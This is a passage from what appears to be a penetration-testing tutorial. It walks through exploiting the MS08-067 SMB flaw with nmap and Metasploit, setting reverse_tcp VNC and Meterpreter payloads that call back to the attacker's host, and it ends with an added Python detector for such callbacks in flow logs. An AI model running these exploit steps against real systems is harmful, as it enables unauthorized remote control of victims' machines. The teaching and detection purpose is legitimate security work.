Remote Exploitation
The command would be as follows:
nmap --script=smb-check-vulns
The output of the script shows that our target is vulnerable to the ms08_067_netapi exploit.
Alternatively, you can also use Nessus to find it, but I prefer nmap as it’s faster.
So now we know that our particular target is vulnerable to ms08_067_netapi. Let’s fire up Metasploit by executing msfconsole from the shell. Once we are in Metasploit, we will use the search command to find that particular exploit:
search ms08_067_netapi
The output shows us the path of the exploit. We would load the exploit by typing the following
command:
use exploit/windows/smb/ms08_067_netapi
The exploit has now loaded. Next, we use the “show options” command to see the available options. We can see three options: RHOST, RPORT, and SMBPIPE. The other two options are already predefined, and we only need to set the RHOST, which would be our target IP.
So we would execute the following command:
set rhost
Note: If the SMB service is running on a different port, we would need to specify that port with the set RPORT command.
Now we have our RHOST set. We would need to set a payload. To recall, a payload is the code that we would like to run on the victim’s computer. We would set the payload to windows/vncinject/reverse_tcp. This will bring back a VNC connection from the victim’s host.
We will use the following command to set a payload:
msf> set payload windows/vncinject/reverse_tcp
Let’s type “show options” to see what options are available inside of this payload. Since we have chosen reverse_tcp, we would need to specify a LHOST so that the victim’s machine can initiate a connection back to our machine. So, we would set the LHOST to our IP.
msf> set LHOST
We would verify the settings by using the “show options” command. In my case, the settings
would look as follows:
Now that we have everything set up, we would use the “exploit” command to execute the
exploit. After the exploit has been completed, Metasploit will open up a VNC session through
which we can gain full control of the victim’s machine.
Obtaining a VNC session or simply a command prompt would not help us much; therefore, we would use another payload called “Meterpreter.” Meterpreter is a powerful script that allows us to perform data harvesting, privilege escalation, and various other types of attacks on the victim machine. The next chapter, “Postexploitation” (Chapter 9), is dedicated to Meterpreter, where we will learn to use it to further penetrate the network.
To use Meterpreter, we would need to use the following command:
set payload windows/meterpreter/reverse_tcp
Again, we would set the LHOST to our local machine’s IP address and finally use the “exploit”
command to open up a Meterpreter session.
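Both payloads above rely on a reverse_tcp callback: the victim connects back to the attacker's LHOST after being hit over SMB. The following is an added example, not from the book, showing how a defender could spot that sequence in flow logs. The log format (timestamp, source, destination, destination port), the hosts, and the callback port 4444 are all constructed for the example.

```python
"""Flag hosts that receive SMB (TCP/445) traffic and shortly afterwards open an
outbound connection back to the same peer: the reverse_tcp callback pattern."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample flow records (not real traffic): time src dst dport
SAMPLE_FLOWS = """\
2024-01-01T10:00:01 10.0.0.5 10.0.0.20 445
2024-01-01T10:00:02 10.0.0.5 10.0.0.20 445
2024-01-01T10:00:09 10.0.0.20 10.0.0.5 4444
2024-01-01T10:05:00 10.0.0.7 10.0.0.20 445
2024-01-01T10:30:00 10.0.0.20 10.0.0.7 80
"""


def parse_flows(text):
    """Parse whitespace-separated flow lines into (time, src, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return flows


def find_reverse_callbacks(flows, window=timedelta(seconds=60)):
    """Return (victim, peer, callback_port) for every SMB-then-callback pair.

    A pair is reported when host A talks to host B on 445 and, within
    `window`, B opens any non-SMB connection back to A. The time window keeps
    ordinary later traffic (B browsing to A much later) from being flagged.
    """
    smb_hits = defaultdict(list)  # (smb_client, smb_server) -> times seen
    for ts, src, dst, dport in flows:
        if dport == 445:
            smb_hits[(src, dst)].append(ts)

    alerts = []
    for ts, src, dst, dport in flows:
        if dport == 445:
            continue
        # src is the suspected victim calling back to dst, the earlier SMB client
        for smb_time in smb_hits.get((dst, src), []):
            if timedelta(0) <= ts - smb_time <= window:
                alerts.append((src, dst, dport))
                break
    return alerts


if __name__ == "__main__":
    for victim, peer, port in find_reverse_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"possible reverse shell: {victim} -> {peer}:{port} after SMB contact")
```

On the sample data only the 10.0.0.20 -> 10.0.0.5:4444 flow is reported; the later connection to 10.0.0.7 falls outside the window.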